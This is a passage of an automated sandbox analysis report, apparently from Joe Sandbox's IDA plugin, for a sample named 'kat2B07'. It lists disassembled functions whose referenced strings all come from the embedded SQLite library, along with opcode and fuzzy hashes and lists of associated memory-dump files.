Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 0-2933911573
Opcode ID: 4c9b0b5cc83ebbf107288648116c99d7f667e2b34ebe68c3545486b518e2cc18
Instruction ID: 354dcdd2c1fffeeb09780decf850a4a3c3e491d374b9324bf24ebd0ed8759d8f
Opcode Fuzzy Hash: 4c9b0b5cc83ebbf107288648116c99d7f667e2b34ebe68c3545486b518e2cc18
Instruction Fuzzy Hash: 4CA19E71554201DBD3005B28AC84BFA77A9DF42235F5541A6FD849B193E62FE10EC7B3

Function 1D752BE0 Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 346COMMON

Download Yara Rule

Strings

unopened, xrefs: 1D752E55
WHERE name=%Q, xrefs: 1D752DB7
misuse, xrefs: 1D752E73
API call with %s database connection pointer, xrefs: 1D752E5A
NULL, xrefs: 1D752E38
ORDER BY name, xrefs: 1D752DCC
SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0), xrefs: 1D752DA4
%s at line %d of [%.10s], xrefs: 1D752E78
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D752E69
invalid, xrefs: 1D752E4E

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: ORDER BY name$%s at line %d of [%.10s]$API call with %s database connection pointer$NULL$SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0)$WHERE name=%Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-1179878930
Opcode ID: 4ba12ae1f5d30ac0d122296aae9f39990118267a2d56b923821366afcdca2952
Instruction ID: 3688a3176d407ee46d82f38786993d783ff0828e9ec14eb7cfa05efffaa2c64b
Opcode Fuzzy Hash: 4ba12ae1f5d30ac0d122296aae9f39990118267a2d56b923821366afcdca2952
Instruction Fuzzy Hash: 55C14374A08300DBD7018F24DCC8B6B37A0AF41375F05852AFC59AB293E735E94A87A3

Function 1D855D70 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 266COMMON

Download Yara Rule

Strings

crisismerge, xrefs: 1D855EF7
rank, xrefs: 1D855FBB
hashsize, xrefs: 1D855DF0
secure-delete, xrefs: 1D856031
pgsz, xrefs: 1D855D81
deletemerge, xrefs: 1D855F64
automerge, xrefs: 1D855E59
usermerge, xrefs: 1D855EAD

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
API String ID: 0-3330941169
Opcode ID: 3b23ab806eb27b20b06bdcd33342769f43f63fd7aaf40117cb92c9c5c38c84bb
Instruction ID: f4f0cfac4307ea850bfc7d9a662fb23893a9f3609a3011af7ec2616ed29ba19a
Opcode Fuzzy Hash: 3b23ab806eb27b20b06bdcd33342769f43f63fd7aaf40117cb92c9c5c38c84bb
Instruction Fuzzy Hash: 77713ABAB042515BCB04DA59FC005AE77D5EFC1216F0504BEFA46D7222EB21F94AC7A3

Function 1D745E20 Relevance: 26.7, APIs: 8, Strings: 7, Instructions: 496COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D745F35, 1D74625D, 1D74638F
SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id', xrefs: 1D745E6F
API called with finalized prepared statement, xrefs: 1D745F1F, 1D746247, 1D746379
%s at line %d of [%.10s], xrefs: 1D745F3A, 1D746262, 1D746394
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D745F2B, 1D746253, 1D746385
no such fts5 table: %s.%s, xrefs: 1D7462EA
recursive definition for %s.%s, xrefs: 1D745E4C

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
API String ID: 0-1070437968
Opcode ID: 2dd5220f366da4d6583203037b90b0a0896407eb6a570906e2cf17b00c82071b
Instruction ID: 9b3265dec14d82ae79369d4250ea8cbb826971acc58315f6f69cb54f2baa6747
Opcode Fuzzy Hash: 2dd5220f366da4d6583203037b90b0a0896407eb6a570906e2cf17b00c82071b
Instruction Fuzzy Hash: 4402E2B4904741EBD712CF28DC84BAB77E4BF85328F21852EE94997212E731E504CBA3

Function 1D7B9980 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 429COMMON

Download Yara Rule

Strings

SELECT %s, xrefs: 1D7B99B1
misuse, xrefs: 1D7B9A3F, 1D7B9D9A
API called with NULL prepared statement, xrefs: 1D7B9A04
API called with finalized prepared statement, xrefs: 1D7B9A19, 1D7B9D84
%s at line %d of [%.10s], xrefs: 1D7B9A44, 1D7B9D9F
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7B9A35, 1D7B9D90
no such function: %s, xrefs: 1D7B9E8C

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
API String ID: 0-3900766660
Opcode ID: aaed1b9c82ff46153de276f72b6df2cda26146d551a6439997e0e0f8a767ebd8
Instruction ID: f871f0afaccc608d2e2a874800304cf28a4c0ae93029290db740c025d08e6d66
Opcode Fuzzy Hash: aaed1b9c82ff46153de276f72b6df2cda26146d551a6439997e0e0f8a767ebd8
Instruction Fuzzy Hash: E2E113B5A087019BD710CF29DC84B6B77E4BF84724F01452EE9A99B352E735E805CBA3

Function 1D773800 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 184COMMON

Download Yara Rule

Strings

integer, xrefs: 1D77389A
real, xrefs: 1D773895, 1D7738EC
misuse, xrefs: 1D77393A
null, xrefs: 1D7738E7
API called with finalized prepared statement, xrefs: 1D773924
cannot open value of type %s, xrefs: 1D7738ED
%s at line %d of [%.10s], xrefs: 1D77393F
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D773930
no such rowid: %lld, xrefs: 1D7739F8

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
API String ID: 0-1477268580
Opcode ID: 89420906d4ad173b4a097cf00254c3f76b1873572c34b0a7361f09aa3165c8d6
Instruction ID: e2cbbeef999ba9105efb9a265a61a9ec38ed6ad54521ca58df0150c5ff44531f
Opcode Fuzzy Hash: 89420906d4ad173b4a097cf00254c3f76b1873572c34b0a7361f09aa3165c8d6
Instruction Fuzzy Hash: BF51F5B46043019FDB109F68DC49A66B3A4FF84329F05496EE6658B752E731F404CBA3

Function 1D896230 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 374COMMON

Download Yara Rule

Strings

'%.*q', xrefs: 1D896562
%02x, xrefs: 1D89660C
NULL, xrefs: 1D896466
NULL, xrefs: 1D896481
%lld, xrefs: 1D89649B
%!.15g, xrefs: 1D8964C2
-- , xrefs: 1D8962B0, 1D8962C0
zeroblob(%d), xrefs: 1D8965AF

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %!.15g$%02x$%lld$'%.*q'$-- $NULL$NULL$zeroblob(%d)
API String ID: 0-3665355275
Opcode ID: 541f96621a07c1395c2884cdc7783cdea0275605445350161a5dda3185720221
Instruction ID: 84f77dee6f7a17891561504fc4947bdb51bcc3eef615fe9d53c1a9c8220084c1
Opcode Fuzzy Hash: 541f96621a07c1395c2884cdc7783cdea0275605445350161a5dda3185720221
Instruction Fuzzy Hash: EED1CFB190C345ABC709CF64D986A6ABBE8AFC961CF044A1DF9C993212E331E544CB53

Function 1D85A150 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 226COMMON

Download Yara Rule

Strings

idx, xrefs: 1D85A200
%s_data, xrefs: 1D85A1BC
data, xrefs: 1D85A1E4
id INTEGER PRIMARY KEY, block BLOB, xrefs: 1D85A1DF
segid, term, pgno, PRIMARY KEY(segid, term), xrefs: 1D85A1FB

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s_data$data$id INTEGER PRIMARY KEY, block BLOB$idx$segid, term, pgno, PRIMARY KEY(segid, term)
API String ID: 0-1009905541
Opcode ID: 40cc2ce978b0adecc9a2a5d3b0ae7f5566b528c51b1f98684b3ae19ea943f7b3
Instruction ID: a34830f0becc35cf70959b14e996c0466c9de0ba9946de4887c350729e753cd5
Opcode Fuzzy Hash: 40cc2ce978b0adecc9a2a5d3b0ae7f5566b528c51b1f98684b3ae19ea943f7b3
Instruction Fuzzy Hash: 1A716B75508310EBD7009B64DCC9B6BB7B8BF0269AF014668F906AB252DB35F514CFA3

Function 1D85F370 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 196COMMON

Download Yara Rule

Strings

docsize, xrefs: 1D85F52D
id INTEGER PRIMARY KEY, sz BLOB, xrefs: 1D85F524, 1D85F52C
k PRIMARY KEY, v, xrefs: 1D85F544
id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER, xrefs: 1D85F51C
content, xrefs: 1D85F49D
id INTEGER PRIMARY KEY, xrefs: 1D85F43E
version, xrefs: 1D85F560
config, xrefs: 1D85F549
, c%d, xrefs: 1D85F469

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
API String ID: 0-3918257174
Opcode ID: f87386d9e7f13b61cf994d6adf7820f8b144749925423c67f3541b4a564d7af4
Instruction ID: 4d14389ed56ffb87c4007c470a4ecba4f19b164e099b7666537be705c9596b74
Opcode Fuzzy Hash: f87386d9e7f13b61cf994d6adf7820f8b144749925423c67f3541b4a564d7af4
Instruction Fuzzy Hash: 62512632908211EBC7109F24DC84B6B77A8EF857A5F054669FD499B202D739F909CBE3

Function 1D73A6C0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 195COMMON

Download Yara Rule

Strings

></polyline>, xrefs: 1D73A845
%g,%g', xrefs: 1D73A7D1
%s, xrefs: 1D73A82E
<polyline points=, xrefs: 1D73A74B
%c%g,%g, xrefs: 1D73A78E

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %g,%g'$ %s$%c%g,%g$<polyline points=$></polyline>
API String ID: 0-3443809342
Opcode ID: 27de8a176392329548cd4f1adebe36a5dbd290c1fc450e17e49d5753a9385965
Instruction ID: 5f6b0c942d82674363ed74f792a855ca8c651191fcd17b2e4ea16a239c850342
Opcode Fuzzy Hash: 27de8a176392329548cd4f1adebe36a5dbd290c1fc450e17e49d5753a9385965
Instruction Fuzzy Hash: F5614970D04711ABD701AF24DC89BA773B5AF42326F01462AE8095B253E735F986CBE3

Function 1D878F40 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 177COMMON

Download Yara Rule

Strings

NULL, xrefs: 1D879148
%!.20e, xrefs: 1D878FF1
NULL, xrefs: 1D87912E
%lld, xrefs: 1D87900C
%!.15g, xrefs: 1D878F83

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %!.15g$%!.20e$%lld$NULL$NULL
API String ID: 0-2115304644
Opcode ID: be408bc4595c4408e5e8c5a3d2af5a12a9ddf37a84f121aa2a80d8d968eae56d
Instruction ID: 5d0d117f46364286382650e53df17cabbfd618971483eaf92e6df7b51d0da587
Opcode Fuzzy Hash: be408bc4595c4408e5e8c5a3d2af5a12a9ddf37a84f121aa2a80d8d968eae56d
Instruction Fuzzy Hash: 785157799087119BD701EF28CC41AABB7F4EF85304F064A9CF89967213E339E50587A3

Function 1D743420 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 392COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D743552, 1D74359E
API called with NULL prepared statement, xrefs: 1D743517
API called with finalized prepared statement, xrefs: 1D74352C, 1D743588
ATTACH x AS %Q, xrefs: 1D74346F
%s at line %d of [%.10s], xrefs: 1D743557, 1D7435A3
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D743548, 1D743594

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-2988319395
Opcode ID: 704a572a49613f87bf1b3edfba1b2cf6cfe90a6da2d787c61a0d0f294e19fcef
Instruction ID: 89164b372f8a45bbaa79c4cba0e73628c83fa8248256f994aaa2f78e579a7921
Opcode Fuzzy Hash: 704a572a49613f87bf1b3edfba1b2cf6cfe90a6da2d787c61a0d0f294e19fcef
Instruction Fuzzy Hash: BAD1F4B09483419BD7028F28DC89B6BB7E4BF41365F21852DE99D8B342E735E544CBA3

Function 1D7CEF60 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

,origin, xrefs: 1D7CF0D6, 1D7CF0DE

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: ,origin
API String ID: 0-4198660907
Opcode ID: 67b05f0aa20ebd248a43f21b912a62c61f7549fd857781d7abe088388447860f
Instruction ID: 6bec59283d06b859ab17a161877b198fa445c4df539760ac380f95e4ac43dd77
Opcode Fuzzy Hash: 67b05f0aa20ebd248a43f21b912a62c61f7549fd857781d7abe088388447860f
Instruction Fuzzy Hash: D071AEB2409302EFD7119F58D884A2AB7F5FF85721F51492EE9868B222D732E854CB53

Function 1D814B10 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 156COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D814C34
rtree constraint failed: %s.(%s<=%s), xrefs: 1D814BF9
UNIQUE constraint failed: %s.%s, xrefs: 1D814BC9
API called with finalized prepared statement, xrefs: 1D814C1E
%s at line %d of [%.10s], xrefs: 1D814C39
